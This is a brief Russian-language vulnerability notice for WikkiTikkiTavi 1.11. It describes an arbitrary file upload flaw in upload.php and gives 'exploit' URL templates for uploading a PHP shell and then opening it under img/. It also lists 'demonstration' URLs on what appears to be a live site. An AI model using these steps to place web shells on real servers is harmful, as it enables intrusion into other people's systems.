Программа: WikkiTikkiTavi 1.11
Найденная уязвимость позволяет загрузить произвольные файлы на целевую
систему. Уязвимость существует из-за ошибки в проверке входных данных в
upload.php. Атакующий может загрузить произвольные файлы на целевую систему.
Эксплоит:
http://c4team.org/ [tavi_PATH] /upload.php
http://c4team.org/ [tavi_PATH] img/[ shell.php ]
Демонстрация:
http://skylined.org/change/tavi/upload.php
http://skylined.org/change/tavi/img/albayx.php
